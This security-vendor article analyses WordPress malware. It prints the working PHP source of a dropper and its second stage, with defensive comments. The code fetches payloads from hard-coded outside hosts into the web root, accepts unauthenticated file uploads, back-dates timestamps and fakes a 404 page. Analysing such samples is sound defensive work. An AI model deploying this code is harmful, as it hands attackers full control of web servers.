wp-info.php

In WordPress themes there are lots of file upload vulnerabilities.

This attack tries to upload the embrace.php file to the server and execute it.

embrace.php

// Enable reporting of every PHP error level (-1 selects all of them).
error_reporting(-1);
/**
 * Download the body of $url over HTTP, making at most three attempts.
 *
 * Uses the curl extension when it is loaded, otherwise falls back to
 * file_get_contents() with a stream context. Both paths send the same
 * hard-coded browser-like User-Agent.
 *
 * Analyst note: this helper is how the sample pulls further payloads from
 * remote hosts, so its outbound requests are what egress filtering and
 * proxy logs will see.
 *
 * @param string $url Address to fetch.
 * @return string|false Response body, or false when every attempt failed.
 */
function fetch_url($url) {
    $contents = false;
    $errs = 0;
    // Retry while the result is falsy; an empty body therefore counts as a failure too.
    while ( !$contents && ($errs++ < 3) )
    {
        // Fixed User-Agent string. NOTE(review): the rv: token (40.0) and the
        // Firefox/ token (43.1) disagree, which looks unlike a genuine Firefox
        // build. The exact string is a candidate for matching in egress logs.
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1';
        if (extension_loaded('curl') && function_exists('curl_init')) {
            $c = curl_init($url);
            // Follow redirects and return the body instead of printing it.
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
            $contents = curl_exec($c);
            // Anything other than HTTP 200 is treated as a failed attempt.
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else
        {
            $options  = array('http' => array('user_agent' => $user_agent));
            $context  = stream_context_create($options);
            // '@' suppresses warnings, so a failed fetch leaves no PHP error output.
            $contents = @file_get_contents($url, false, $context);                
        }
    }
    return $contents;
}
// Request dispatcher of the dropper. Which branch runs depends only on which
// request parameter is present; no authentication check is visible, so anyone
// who knows the parameter names can trigger it. $_REQUEST is used, so the
// trigger may arrive in the query string or the POST body (cookies too,
// depending on request_order).
// Detection summary for defenders: an unexpected wp-info.php in the document
// root, outbound requests to the hard-coded hosts below, the marker strings
// "Teddy already in place" / "Teddy-done" / "Teddy-is-here" in responses, and
// new .php files whose modification time is older than their creation.
$test=$_SERVER['DOCUMENT_ROOT'];
if(isset($_REQUEST['doit'])){
// 'doit': install the second stage as wp-info.php in the document root,
// unless a file of that name already exists.
if (file_exists("$test/wp-info.php")){
echo "Teddy already in place";
}
else{
// The remote file is named license.txt but its content is written out as PHP.
// The fetch result is not checked before it is written.
$link = fetch_url("http://www.wayiview.com/license.txt");
file_put_contents("$test/wp-info.php", $link);
echo "Teddy-done";
}
}
elseif(isset($_REQUEST['up'])){
// 'up': arbitrary file upload.
if(isset($_POST['Submit'])){
    // Empty prefix: the destination is a relative path, resolved against the
    // current working directory.
    $filedir = ""; 
    // Declared but never used in the visible code, so no size limit is enforced.
    $maxfile = '2888888';

    // The file name comes straight from the client; no extension or type check follows.
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        // '@' hides any failure; the "Done" message below is printed either way.
        @move_uploaded_file($userfile_tmp, $abod);
  
echo"<center><b>Done ==> <a href='./$userfile_name'>$userfile_name</a></b></center>";
}
}
else{
// No form submitted yet: print the host's OS/kernel string and the upload form.
echo '<b>'.php_uname().'</b>';
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
}
elseif(isset($_REQUEST['f3'])){
// 'f3': fetch another payload from a host whose top-level domain is picked at
// random from this list. All listed variants belong in a blocklist or hunt query.
$dom = array_rand(array_flip(array("ml", "cf", "ga", "gq", "cu.cc")), 1);
// uniqid() yields a time-based identifier, used here as the dropped file's name.
$shname3 = uniqid();
$f3 = fetch_url("http://comxvas.$dom/3.txt");
$shnam3 = ("./$shname3.php");
file_put_contents($shnam3, $f3);
echo"<center><b>Done ==> <a href='./".$shname3.".php'>".$shname3.".php</a></b></center>";
// Back-dates the file's timestamps by a random 30 to 365 days, so a search for
// "recently modified" files will miss it. touch() cannot set the inode change
// time, so ctime or file-integrity monitoring still exposes the new file.
touch("./$shname3.php", time() - mt_rand(60*60*24*30, 60*60*24*365));
}
else {
// No recognised parameter: print a fixed marker string.
echo "Teddy-is-here";
}

wp-info.php

This malware can download more and more malware onto the server and take full control of it.

/**
 * Download the body of $url over HTTP, making at most three attempts.
 *
 * Uses the curl extension when it is loaded, otherwise falls back to
 * file_get_contents() with a stream context. Both paths send the same
 * hard-coded User-Agent.
 *
 * Analyst note: this is the download helper of the second-stage file. Its
 * User-Agent carries an extra " googlebot" suffix compared with the one in
 * embrace.php, so the two stages can be told apart in egress logs.
 *
 * @param string $url Address to fetch.
 * @return string|false Response body, or false when every attempt failed.
 */
function fetch_url($url) {
    $contents = false;
    $errs = 0;
    // Retry while the result is falsy; an empty body therefore counts as a failure too.
    while ( !$contents && ($errs++ < 3) )
    {
        // Fixed User-Agent: a browser-like string with "googlebot" appended.
        // The exact value is a candidate for matching in proxy logs.
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1 googlebot';
        if (extension_loaded('curl') && function_exists('curl_init')) {
            $c = curl_init($url);
            // Follow redirects and return the body instead of printing it.
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
            $contents = curl_exec($c);
            // Anything other than HTTP 200 is treated as a failed attempt.
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else
        {
            $options  = array('http' => array('user_agent' => $user_agent));
            $context  = stream_context_create($options);
            // '@' suppresses warnings, so a failed fetch leaves no PHP error output.
            $contents = @file_get_contents($url, false, $context);                
        }
    }
    return $contents;
}
// Excerpt of the second stage's request handling. The listing is abridged:
// the dotted lines are elisions in the article, and the closing brace of the
// outer if is not shown.
if(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
.
.
.
}
else{
// 'up' without a submitted form: print a page that imitates a web server's
// "404 Not Found" error, filled in with the requested URI and the server name.
// NOTE(review): no header() or http_response_code() call appears in the
// visible lines, so the response status is presumably still 200. A
// "404 Not Found" body served with a 200 status is worth hunting for in
// access logs and scanner output.
echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>

<h1>Not Found (404)</h1>

The requested URL ";
echo $_SERVER['REQUEST_URI'];
echo "
was not found on this server.
<hr>

";
echo $_SERVER['SERVER_NAME'];
}

Final words

Websites that use the Malware Expert – ModSecurity rules are protected against this attack.

Use Malware Expert – Signatures to detect this malware in files for FREE!